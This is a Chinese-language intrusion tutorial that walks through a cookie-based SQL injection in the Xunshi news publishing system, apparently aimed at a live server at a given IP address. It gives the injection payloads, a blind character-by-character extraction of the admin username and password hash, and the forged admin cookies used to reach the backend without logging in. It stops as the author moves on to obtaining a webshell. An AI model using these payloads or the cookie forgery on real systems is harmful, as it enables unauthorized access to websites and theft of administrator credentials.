最新版讯时新闻发布系统惊爆cookie漏洞

   用order by函数判断参与SQL查询的字段为26个，提交 http://222.90.4.20/news/admin_ne ... 0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20admin ，返回错误，如图1所示：


   然后，我们在admin_conn.asp 文件中发现如下代码：
   sss=LCase(request.servervariables("QUERY_STRING"))
   if instr(sss,"select")<>0 or instr(sss,"inster")<>0 or instr(sss,"delete")<>0 or instr(sss,"(")<>0 or instr(sss,"'or")<>0 then
     response.write "<BR><BR><center>你的网址不合法"
     response.end
   end if

   过滤了request.querystring方法获取从客户端传来的数据，过滤的内容是select,inster,delete等。虽然做了这个限制，但是我们还是可以利用cookie进行注入，因为前面的漏洞代码里面用的是request而不是request.querystring,所以我们还有reuqest.cookie方法让服务端获取我们这里的数据。
    先访问：http://222.90.4.20/news/admin_news_view.asp?newsid=26,然后去掉此URL，再   提交：javascript:alert(document.cookie="newsid="+escape("26 and 1=1"))返回如图2所示：
  
   然后在访问http://222.90.4.20/news/admin_news_view.asp，返回如图3：

    
   说明我们提交的url已经有参与了sql查询，而且查询所得结果为真。再提交：
  javascript:alert(document.cookie="newsid="+escape("26 and (select asc(mid(user,1,1)) from [admin] where id=1)=97"))
   返回如图4所示：
  
   判断id=1的user（管理员）的第一个字符的ascii码值是否为97。相信大家以前看过花花的文章，大概的cookie注入也就这样了。下面是猜密码的。
  javascript:alert(document.cookie="newsid="+escape("26 and (select asc(mid(pass,1,1)) from [admin] where id=1)=97"))

  通过一一猜解所得的用户名和密码的ASSCII分别是97 100 109 105 110，50 49 50 51 50 102 50 57 55 97 53 55 97 53 97 55 52 51 56 57 52 97 48 101 52 97 56 48 49 102 99 51，转换后的结果分别是admin和21232f297a57a5a743894a0e4a801fc3。然后我们不必去破解密码，拿出老兵叔的cookie欺骗工具，在cookies栏里输入：admindj=1; adminpass=21232f297a57a5a743894a0e4a801fc3; adminuser=admin; （保持绿色小球处于按下状态）然后在address栏里输入：http://222.90.4.20/news/admin_index.asp，提交！这样我们就可以不经登陆直接进到后台了。如图5所示：
  
  进到后台就是拿WEBSHELL了。打开网友投稿，如图6所示：